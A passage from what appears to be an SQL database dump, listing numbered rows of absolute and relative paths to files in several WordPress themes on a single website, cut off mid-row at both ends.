tent/themes/succulents/framework/modules/woocommerce/shortcodes/shortcodes-functions.php'),(13006,'/home/tummmyov/tummyrevolution.com/wp-content/themes/succulents/framework/modules/woocommerce/templates/parts/add-to-cart.php','wp-content/themes/succulents/framework/modules/woocommerce/templates/parts/add-to-cart.php'),(13007,'/home/tummmyov/tummyrevolution.com/wp-content/themes/succulents/framework/modules/woocommerce/templates/parts/category.php','wp-content/themes/succulents/framework/modules/woocommerce/templates/parts/category.php'),(13008,'/home/tummmyov/tummyrevolution.com/wp-content/themes/succulents/framework/modules/woocommerce/templates/parts/excerpt.php','wp-content/themes/succulents/framework/modules/woocommerce/templates/parts/excerpt.php'),(13009,'/home/tummmyov/tummyrevolution.com/wp-content/themes/succulents/framework/modules/woocommerce/templates/parts/image-simple.php','wp-content/themes/succulents/framework/modules/woocommerce/templates/parts/image-simple.php'),(13010,'/home/tummmyov/tummyrevolution.com/wp-content/themes/succulents/framework/modules/woocommerce/templates/parts/image.php','wp-content/themes/succulents/framework/modules/woocommerce/templates/parts/image.php'),(13011,'/home/tummmyov/tummyrevolution.com/wp-content/themes/succulents/framework/modules/woocommerce/templates/parts/no-posts.php','wp-content/themes/succulents/framework/modules/woocommerce/templates/parts/no-posts.php'),(13012,'/home/tummmyov/tummyrevolution.com/wp-content/themes/succulents/framework/modules/woocommerce/templates/parts/price.php','wp-content/themes/succulents/framework/modules/woocommerce/templates/parts/price.php'),(13013,'/home/tummmyov/tummyrevolution.com/wp-content/themes/succulents/framework/modules/woocommerce/templates/parts/rating.php','wp-content/themes/succulents/framework/modules/woocommerce/templates/parts/rating.php'),(13014,'/home/tummmyov/tummyrevolution.com/wp-content/themes/succulents/framework/modules/woocommerce/templates/parts/title.php','wp-content/themes/succulents/framework/modules/woocommerce/templates/parts/title.php'),(13015,'/home/tummmyov/tummyrevolution.com/wp-content/themes/succulents/framework/modules/woocommerce/woocommerce-config.php','wp-content/themes/succulents/framework/modules/woocommerce/woocommerce-config.php'),(13016,'/home/tummmyov/tummyrevolution.com/wp-content/themes/succulents/framework/modules/woocommerce/woocommerce-functions.php','wp-content/themes/succulents/framework/modules/woocommerce/woocommerce-functions.php'),(13017,'/home/tummmyov/tummyrevolution.com/wp-content/themes/succulents/framework/modules/woocommerce/woocommerce-template-hooks.php','wp-content/themes/succulents/framework/modules/woocommerce/woocommerce-template-hooks.php'),(13018,'/home/tummmyov/tummyrevolution.com/wp-content/themes/succulents/framework/modules/wpml/load.php','wp-content/themes/succulents/framework/modules/wpml/load.php'),(13019,'/home/tummmyov/tummyrevolution.com/wp-content/themes/succulents/framework/modules/wpml/wpml-functions.php','wp-content/themes/succulents/framework/modules/wpml/wpml-functions.php'),(13020,'/home/tummmyov/tummyrevolution.com/wp-content/themes/succulents/framework/qodef-framework.php','wp-content/themes/succulents/framework/qodef-framework.php'),(13021,'/home/tummmyov/tummyrevolution.com/wp-content/themes/succulents/full-width.php','wp-content/themes/succulents/full-width.php'),(13022,'/home/tummmyov/tummyrevolution.com/wp-content/themes/succulents/functions.php','wp-content/themes/succulents/functions.php'),(13023,'/home/tummmyov/tummyrevolution.com/wp-content/themes/succulents/header.php','wp-content/themes/succulents/header.php'),(13024,'/home/tummmyov/tummyrevolution.com/wp-content/themes/succulents/includes/nav-menu/edit_custom_walker.php','wp-content/themes/succulents/includes/nav-menu/edit_custom_walker.php'),(13025,'/home/tummmyov/tummyrevolution.com/wp-content/themes/succulents/includes/nav-menu/qodef-menu.php','wp-content/themes/succulents/includes/nav-menu/qodef-menu.php'),(13026,'/home/tummmyov/tummyrevolution.com/wp-content/themes/succulents/includes/nav-menu/top-navigation-walker.php','wp-content/themes/succulents/includes/nav-menu/top-navigation-walker.php'),(13027,'/home/tummmyov/tummyrevolution.com/wp-content/themes/succulents/includes/plugins/class-tgm-plugin-activation.php','wp-content/themes/succulents/includes/plugins/class-tgm-plugin-activation.php'),(13028,'/home/tummmyov/tummyrevolution.com/wp-content/themes/succulents/includes/plugins/plugins-activation.php','wp-content/themes/succulents/includes/plugins/plugins-activation.php'),(13029,'/home/tummmyov/tummyrevolution.com/wp-content/themes/succulents/includes/qodef-body-class-functions.php','wp-content/themes/succulents/includes/qodef-body-class-functions.php'),(13030,'/home/tummmyov/tummyrevolution.com/wp-content/themes/succulents/includes/qodef-loading-spinners.php','wp-content/themes/succulents/includes/qodef-loading-spinners.php'),(13031,'/home/tummmyov/tummyrevolution.com/wp-content/themes/succulents/index.php','wp-content/themes/succulents/index.php'),(13032,'/home/tummmyov/tummyrevolution.com/wp-content/themes/succulents/page.php','wp-content/themes/succulents/page.php'),(13033,'/home/tummmyov/tummyrevolution.com/wp-content/themes/succulents/search.php','wp-content/themes/succulents/search.php'),(13034,'/home/tummmyov/tummyrevolution.com/wp-content/themes/succulents/searchform.php','wp-content/themes/succulents/searchform.php'),(13035,'/home/tummmyov/tummyrevolution.com/wp-content/themes/succulents/sidebar.php','wp-content/themes/succulents/sidebar.php'),(13036,'/home/tummmyov/tummyrevolution.com/wp-content/themes/succulents/single.php','wp-content/themes/succulents/single.php'),(13037,'/home/tummmyov/tummyrevolution.com/wp-content/themes/succulents/slider.php','wp-content/themes/succulents/slider.php'),(13038,'/home/tummmyov/tummyrevolution.com/wp-content/themes/succulents/theme-includes.php','wp-content/themes/succulents/theme-includes.php'),(13039,'/home/tummmyov/tummyrevolution.com/wp-content/themes/succulents/vc-templates/rev_slider_vc.php','wp-content/themes/succulents/vc-templates/rev_slider_vc.php'),(13040,'/home/tummmyov/tummyrevolution.com/wp-content/themes/succulents/vc-templates/vc_row.php','wp-content/themes/succulents/vc-templates/vc_row.php'),(13041,'/home/tummmyov/tummyrevolution.com/wp-content/themes/succulents/vc-templates/vc_row_inner.php','wp-content/themes/succulents/vc-templates/vc_row_inner.php'),(13042,'/home/tummmyov/tummyrevolution.com/wp-content/themes/succulents/woocommerce/content-product.php','wp-content/themes/succulents/woocommerce/content-product.php'),(13043,'/home/tummmyov/tummyrevolution.com/wp-content/themes/succulents/woocommerce/global/quantity-input.php','wp-content/themes/succulents/woocommerce/global/quantity-input.php'),(13044,'/home/tummmyov/tummyrevolution.com/wp-content/themes/succulents/woocommerce/product-searchform.php','wp-content/themes/succulents/woocommerce/product-searchform.php'),(13045,'/home/tummmyov/tummyrevolution.com/wp-content/themes/succulents/woocommerce.php','wp-content/themes/succulents/woocommerce.php'),(13046,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/404.php','wp-content/themes/twentynineteen/404.php'),(13047,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/archive.php','wp-content/themes/twentynineteen/archive.php'),(13048,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/classes/class-twentynineteen-svg-icons.php','wp-content/themes/twentynineteen/classes/class-twentynineteen-svg-icons.php'),(13049,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/classes/class-twentynineteen-walker-comment.php','wp-content/themes/twentynineteen/classes/class-twentynineteen-walker-comment.php'),(13050,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/comments.php','wp-content/themes/twentynineteen/comments.php'),(13051,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/fonts/NonBreakingSpaceOverride.woff','wp-content/themes/twentynineteen/fonts/NonBreakingSpaceOverride.woff'),(13052,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/fonts/NonBreakingSpaceOverride.woff2','wp-content/themes/twentynineteen/fonts/NonBreakingSpaceOverride.woff2'),(13053,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/footer.php','wp-content/themes/twentynineteen/footer.php'),(13054,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/functions.php','wp-content/themes/twentynineteen/functions.php'),(13055,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/header.php','wp-content/themes/twentynineteen/header.php'),(13056,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/image.php','wp-content/themes/twentynineteen/image.php'),(13057,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/inc/back-compat.php','wp-content/themes/twentynineteen/inc/back-compat.php'),(13058,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/inc/color-patterns.php','wp-content/themes/twentynineteen/inc/color-patterns.php'),(13059,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/inc/customizer.php','wp-content/themes/twentynineteen/inc/customizer.php'),(13060,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/inc/helper-functions.php','wp-content/themes/twentynineteen/inc/helper-functions.php'),(13061,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/inc/icon-functions.php','wp-content/themes/twentynineteen/inc/icon-functions.php'),(13062,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/inc/template-functions.php','wp-content/themes/twentynineteen/inc/template-functions.php'),(13063,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/inc/template-tags.php','wp-content/themes/twentynineteen/inc/template-tags.php'),(13064,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/index.php','wp-content/themes/twentynineteen/index.php'),(13065,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/js/customize-controls.js','wp-content/themes/twentynineteen/js/customize-controls.js'),(13066,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/js/customize-preview.js','wp-content/themes/twentynineteen/js/customize-preview.js'),(13067,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/js/priority-menu.js','wp-content/themes/twentynineteen/js/priority-menu.js'),(13068,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/js/skip-link-focus-fix.js','wp-content/themes/twentynineteen/js/skip-link-focus-fix.js'),(13069,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/js/touch-keyboard-navigation.js','wp-content/themes/twentynineteen/js/touch-keyboard-navigation.js'),(13070,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/package-lock.json','wp-content/themes/twentynineteen/package-lock.json'),(13071,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/package.json','wp-content/themes/twentynineteen/package.json'),(13072,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/page.php','wp-content/themes/twentynineteen/page.php'),(13073,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/postcss.config.js','wp-content/themes/twentynineteen/postcss.config.js'),(13074,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/print.css','wp-content/themes/twentynineteen/print.css'),(13075,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/print.scss','wp-content/themes/twentynineteen/print.scss'),(13076,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/readme.txt','wp-content/themes/twentynineteen/readme.txt'),(13077,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/sass/_normalize.scss','wp-content/themes/twentynineteen/sass/_normalize.scss'),(13078,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/sass/blocks/_blocks.scss','wp-content/themes/twentynineteen/sass/blocks/_blocks.scss'),(13079,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/sass/elements/_elements.scss','wp-content/themes/twentynineteen/sass/elements/_elements.scss'),(13080,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/sass/elements/_lists.scss','wp-content/themes/twentynineteen/sass/elements/_lists.scss'),(13081,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/sass/elements/_tables.scss','wp-content/themes/twentynineteen/sass/elements/_tables.scss'),(13082,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/sass/forms/_buttons.scss','wp-content/themes/twentynineteen/sass/forms/_buttons.scss'),(13083,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/sass/forms/_fields.scss','wp-content/themes/twentynineteen/sass/forms/_fields.scss'),(13084,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/sass/forms/_forms.scss','wp-content/themes/twentynineteen/sass/forms/_forms.scss'),(13085,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/sass/layout/_layout.scss','wp-content/themes/twentynineteen/sass/layout/_layout.scss'),(13086,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/sass/media/_captions.scss','wp-content/themes/twentynineteen/sass/media/_captions.scss'),(13087,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/sass/media/_galleries.scss','wp-content/themes/twentynineteen/sass/media/_galleries.scss'),(13088,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/sass/media/_media.scss','wp-content/themes/twentynineteen/sass/media/_media.scss'),(13089,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/sass/mixins/_mixins-master.scss','wp-content/themes/twentynineteen/sass/mixins/_mixins-master.scss'),(13090,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/sass/mixins/_utilities.scss','wp-content/themes/twentynineteen/sass/mixins/_utilities.scss'),(13091,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/sass/modules/_accessibility.scss','wp-content/themes/twentynineteen/sass/modules/_accessibility.scss'),(13092,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/sass/modules/_alignments.scss','wp-content/themes/twentynineteen/sass/modules/_alignments.scss'),(13093,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/sass/modules/_clearings.scss','wp-content/themes/twentynineteen/sass/modules/_clearings.scss'),(13094,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/sass/navigation/_links.scss','wp-content/themes/twentynineteen/sass/navigation/_links.scss'),(13095,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/sass/navigation/_menu-footer-navigation.scss','wp-content/themes/twentynineteen/sass/navigation/_menu-footer-navigation.scss'),(13096,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/sass/navigation/_menu-main-navigation.scss','wp-content/themes/twentynineteen/sass/navigation/_menu-main-navigation.scss'),(13097,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/sass/navigation/_menu-social-navigation.scss','wp-content/themes/twentynineteen/sass/navigation/_menu-social-navigation.scss'),(13098,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/sass/navigation/_navigation.scss','wp-content/themes/twentynineteen/sass/navigation/_navigation.scss'),(13099,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/sass/navigation/_next-previous.scss','wp-content/themes/twentynineteen/sass/navigation/_next-previous.scss'),(13100,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/sass/site/_site.scss','wp-content/themes/twentynineteen/sass/site/_site.scss'),(13101,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/sass/site/footer/_site-footer.scss','wp-content/themes/twentynineteen/sass/site/footer/_site-footer.scss'),(13102,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/sass/site/header/_site-featured-image.scss','wp-content/themes/twentynineteen/sass/site/header/_site-featured-image.scss'),(13103,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/sass/site/header/_site-header.scss','wp-content/themes/twentynineteen/sass/site/header/_site-header.scss'),(13104,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/sass/site/primary/_archives.scss','wp-content/themes/twentynineteen/sass/site/primary/_archives.scss'),(13105,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/sass/site/primary/_comments.scss','wp-content/themes/twentynineteen/sass/site/primary/_comments.scss'),(13106,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/sass/site/primary/_posts-and-pages.scss','wp-content/themes/twentynineteen/sass/site/primary/_posts-and-pages.scss'),(13107,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/sass/site/secondary/_widgets.scss','wp-content/themes/twentynineteen/sass/site/secondary/_widgets.scss'),(13108,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/sass/typography/_copy.scss','wp-content/themes/twentynineteen/sass/typography/_copy.scss'),(13109,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/sass/typography/_headings.scss','wp-content/themes/twentynineteen/sass/typography/_headings.scss'),(13110,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/sass/typography/_typography.scss','wp-content/themes/twentynineteen/sass/typography/_typography.scss'),(13111,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/sass/variables-site/_colors.scss','wp-content/themes/twentynineteen/sass/variables-site/_colors.scss'),(13112,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/sass/variables-site/_columns.scss','wp-content/themes/twentynineteen/sass/variables-site/_columns.scss'),(13113,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/sass/variables-site/_fonts.scss','wp-content/themes/twentynineteen/sass/variables-site/_fonts.scss'),(13114,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/sass/variables-site/_structure.scss','wp-content/themes/twentynineteen/sass/variables-site/_structure.scss'),(13115,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/sass/variables-site/_transitions.scss','wp-content/themes/twentynineteen/sass/variables-site/_transitions.scss'),(13116,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/sass/variables-site/_variables-site.scss','wp-content/themes/twentynineteen/sass/variables-site/_variables-site.scss'),(13117,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/screenshot.png','wp-content/themes/twentynineteen/screenshot.png'),(13118,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/search.php','wp-content/themes/twentynineteen/search.php'),(13119,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/single.php','wp-content/themes/twentynineteen/single.php'),(13120,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/style-editor-customizer.css','wp-content/themes/twentynineteen/style-editor-customizer.css'),(13121,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/style-editor-customizer.scss','wp-content/themes/twentynineteen/style-editor-customizer.scss'),(13122,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/style-editor.css','wp-content/themes/twentynineteen/style-editor.css'),(13123,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/style-editor.scss','wp-content/themes/twentynineteen/style-editor.scss'),(13124,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/style-rtl.css','wp-content/themes/twentynineteen/style-rtl.css'),(13125,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/style.css','wp-content/themes/twentynineteen/style.css'),(13126,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/style.scss','wp-content/themes/twentynineteen/style.scss'),(13127,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/template-parts/content/content-excerpt.php','wp-content/themes/twentynineteen/template-parts/content/content-excerpt.php'),(13128,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/template-parts/content/content-none.php','wp-content/themes/twentynineteen/template-parts/content/content-none.php'),(13129,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/template-parts/content/content-page.php','wp-content/themes/twentynineteen/template-parts/content/content-page.php'),(13130,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/template-parts/content/content-single.php','wp-content/themes/twentynineteen/template-parts/content/content-single.php'),(13131,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/template-parts/content/content.php','wp-content/themes/twentynineteen/template-parts/content/content.php'),(13132,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/template-parts/footer/footer-widgets.php','wp-content/themes/twentynineteen/template-parts/footer/footer-widgets.php'),(13133,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/template-parts/header/entry-header.php','wp-content/themes/twentynineteen/template-parts/header/entry-header.php'),(13134,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/template-parts/header/site-branding.php','wp-content/themes/twentynineteen/template-parts/header/site-branding.php'),(13135,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/template-parts/post/author-bio.php','wp-content/themes/twentynineteen/template-parts/post/author-bio.php'),(13136,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/template-parts/post/discussion-meta.php','wp-content/themes/twentynineteen/template-parts/post/discussion-meta.php'),(13137,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/404.php','wp-content/themes/twentyseventeen/404.php'),(13138,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/archive.php','wp-content/themes/twentyseventeen/archive.php'),(13139,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/assets/css/blocks.css','wp-content/themes/twentyseventeen/assets/css/blocks.css'),(13140,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/assets/css/colors-dark.css','wp-content/themes/twentyseventeen/assets/css/colors-dark.css'),(13141,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/assets/css/editor-blocks.css','wp-content/themes/twentyseventeen/assets/css/editor-blocks.css'),(13142,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/assets/css/editor-style.css','wp-content/themes/twentyseventeen/assets/css/editor-style.css'),(13143,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/assets/css/ie8.css','wp-content/themes/twentyseventeen/assets/css/ie8.css'),(13144,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/assets/css/ie9.css','wp-content/themes/twentyseventeen/assets/css/ie9.css'),(13145,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/assets/images/coffee.jpg','wp-content/themes/twentyseventeen/assets/images/coffee.jpg'),(13146,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/assets/images/espresso.jpg','wp-content/themes/twentyseventeen/assets/images/espresso.jpg'),(13147,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/assets/images/header.jpg','wp-content/themes/twentyseventeen/assets/images/header.jpg'),(13148,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/assets/images/sandwich.jpg','wp-content/themes/twentyseventeen/assets/images/sandwich.jpg'),(13149,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/assets/images/svg-icons.svg','wp-content/themes/twentyseventeen/assets/images/svg-icons.svg'),(13150,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/assets/js/customize-controls.js','wp-content/themes/twentyseventeen/assets/js/customize-controls.js'),(13151,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/assets/js/customize-preview.js','wp-content/themes/twentyseventeen/assets/js/customize-preview.js'),(13152,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/assets/js/global.js','wp-content/themes/twentyseventeen/assets/js/global.js'),(13153,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/assets/js/html5.js','wp-content/themes/twentyseventeen/assets/js/html5.js'),(13154,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/assets/js/jquery.scrollTo.js','wp-content/themes/twentyseventeen/assets/js/jquery.scrollTo.js'),(13155,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/assets/js/navigation.js','wp-content/themes/twentyseventeen/assets/js/navigation.js'),(13156,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/assets/js/skip-link-focus-fix.js','wp-content/themes/twentyseventeen/assets/js/skip-link-focus-fix.js'),(13157,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/comments.php','wp-content/themes/twentyseventeen/comments.php'),(13158,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/footer.php','wp-content/themes/twentyseventeen/footer.php'),(13159,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/front-page.php','wp-content/themes/twentyseventeen/front-page.php'),(13160,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/functions.php','wp-content/themes/twentyseventeen/functions.php'),(13161,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/header.php','wp-content/themes/twentyseventeen/header.php'),(13162,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/inc/back-compat.php','wp-content/themes/twentyseventeen/inc/back-compat.php'),(13163,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/inc/block-patterns.php','wp-content/themes/twentyseventeen/inc/block-patterns.php'),(13164,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/inc/color-patterns.php','wp-content/themes/twentyseventeen/inc/color-patterns.php'),(13165,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/inc/custom-header.php','wp-content/themes/twentyseventeen/inc/custom-header.php'),(13166,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/inc/customizer.php','wp-content/themes/twentyseventeen/inc/customizer.php'),(13167,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/inc/icon-functions.php','wp-content/themes/twentyseventeen/inc/icon-functions.php'),(13168,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/inc/template-functions.php','wp-content/themes/twentyseventeen/inc/template-functions.php'),(13169,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/inc/template-tags.php','wp-content/themes/twentyseventeen/inc/template-tags.php'),(13170,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/index.php','wp-content/themes/twentyseventeen/index.php'),(13171,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/page.php','wp-content/themes/twentyseventeen/page.php'),(13172,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/rtl.css','wp-content/themes/twentyseventeen/rtl.css'),(13173,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/screenshot.png','wp-content/themes/twentyseventeen/screenshot.png'),(13174,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/search.php','wp-content/themes/twentyseventeen/search.php'),(13175,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/searchform.php','wp-content/themes/twentyseventeen/searchform.php'),(13176,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/sidebar.php','wp-content/themes/twentyseventeen/sidebar.php'),(13177,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/single.php','wp-content/themes/twentyseventeen/single.php'),(13178,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/style.css','wp-content/themes/twentyseventeen/style.css'),(13179,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/template-parts/footer/footer-widgets.php','wp-content/themes/twentyseventeen/template-parts/footer/footer-widgets.php'),(13180,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/template-parts/footer/site-info.php','wp-content/themes/twentyseventeen/template-parts/footer/site-info.php'),(13181,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/template-parts/header/header-image.php','wp-content/themes/twentyseventeen/template-parts/header/header-image.php'),(13182,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/template-parts/header/site-branding.php','wp-content/themes/twentyseventeen/template-parts/header/site-branding.php'),(13183,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/template-parts/navigation/navigation-top.php','wp-content/themes/twentyseventeen/template-parts/navigation/navigation-top.php'),(13184,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/template-parts/page/content-front-page-panels.php','wp-content/themes/twentyseventeen/template-parts/page/content-front-page-panels.php'),(13185,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/template-parts/page/content-front-page.php','wp-content/themes/twentyseventeen/template-parts/page/content-front-page.php'),(13186,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/template-parts/page/content-page.php','wp-content/themes/twentyseventeen/template-parts/page/content-page.php'),(13187,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/template-parts/post/content-audio.php','wp-content/themes/twentyseventeen/template-parts/post/content-audio.php'),(13188,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/template-parts/post/content-excerpt.php','wp-content/themes/twentyseventeen/template-parts/post/content-excerpt.php'),(13189,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/template-parts/post/content-gallery.php','wp-content/themes/twentyseventeen/template-parts/post/content-gallery.php'),(13190,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/template-parts/post/content-image.php','wp-content/themes/twentyseventeen/template-parts/post/content-image.php'),(13191,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/template-parts/post/content-none.php','wp-content/themes/twentyseventeen/template-parts/post/content-none.php'),(13192,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/template-parts/post/content-video.php','wp-content/themes/twentyseventeen/template-parts/post/content-video.php'),(13193,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/template-parts/post/content.php','wp-content/themes/twentyseventeen/template-parts/post/content.php'),(13194,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentysixteen/404.php','wp-content/themes/twentysixteen/404.php'),(13195,'/home/tummmyov/tummyrevolution.com/wp-content/themes/twentysixteen/archive.php','wp-content/themes/twentysixteen/